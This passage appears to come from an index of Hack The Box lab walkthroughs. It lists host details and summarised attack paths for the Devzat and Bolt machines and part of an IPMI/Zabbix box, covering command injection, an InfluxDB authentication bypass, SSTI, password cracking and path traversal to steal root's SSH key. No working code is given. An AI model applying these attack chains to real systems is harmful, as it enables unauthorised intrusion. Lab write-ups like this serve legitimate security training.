623/UDP | IPMI | IPMI 2.0

User Own:

  • Virtual Hosting.
  • Subdomain and directory fuzzing.
  • IPMI 2.0 – Cracking “Administrator” password (https://github.com/c0rnf13ld/ipmiPwner)
  • Zabbix 5.0.17 – Remote code execution (RCE) (Authenticated) – Creating a “system.run” key item to execute commands.
  • Password reuse for user “ipmi-svc”.

System Own:


Devzat

By: c1sc0

Linux – 10.10.11.118 Medium

Linux devzat 5.4.0-77-generic #86-Ubuntu SMP Thu Jun 17 02:35:03 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 20.04.2 LTS – Focal

Active services:

PORT | SERVICE | VERSION
22 | SSH | OpenSSH 8.2p1
80 | HTTP | Apache httpd 2.4.41
8000 | SSH | Chat over SSH (https://github.com/quackduck/devzat)

User Own:

  • Virtual Hosting.
  • Subdomain Fuzzing.
  • .git directory – Go code analysis – Remote Command Execution (RCE) by modifying the JSON POST data to inject system commands – Access as “patrick” user.
  • System enumeration – InfluxDB running on port 8086 – Authentication Bypass (CVE-2019-20933) – (https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933) – Obtaining user credentials – User pivoting to “catherine”.

System Own:

  • System enumeration – Chat over SSH beta running on port 8443.
  • Chat backup file – Hard-coded password.
  • SSH chat – Abusing the /file command and path traversal to read system files as root – Get root id_rsa.

Bolt

By: d4rkpayl0ad & TheCyberGeek

Linux – 10.10.11.114 Medium

Linux bolt.htb 5.13.0-27-generic #29~20.04.1-Ubuntu SMP Fri Jan 14 00:32:30 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 20.04.03 LTS – Focal

Active services:

PORT | SERVICE | VERSION
22 | SSH | OpenSSH 8.2p1
80/443 | HTTP | nginx 1.18.0

User Own:

  • Virtual Hosting.
  • Download and analyse the Docker image – db.sqlite3 file with user credentials – Password cracking – Access to AdminLTE 3 (https://adminlte.io/).
  • Information leaked – Subdomain fuzzing.
  • Searching for invite_code in the Docker image file to create an account – Access to AdminLTE 3 demo and Roundcube mail.
  • Server Side Template Injection (SSTi – jinja2) – Access as “www-data” user.
  • System enumeration as www-data – MySQL credentials in a Passbolt PHP file – Database enumeration – Find a PGP encrypted message.
  • Password reused for user “eddie”.
  • System enumeration as eddie – Find GPG private key into a google chrome log file – GPG2john – Cracking GPG hash –

System Own:

  • System enumeration as eddie – Find GPG private key in a Google Chrome log file – gpg2john – Cracking the GPG hash – Decrypt the GPG message to read a password.
  • Password reused for user “root”.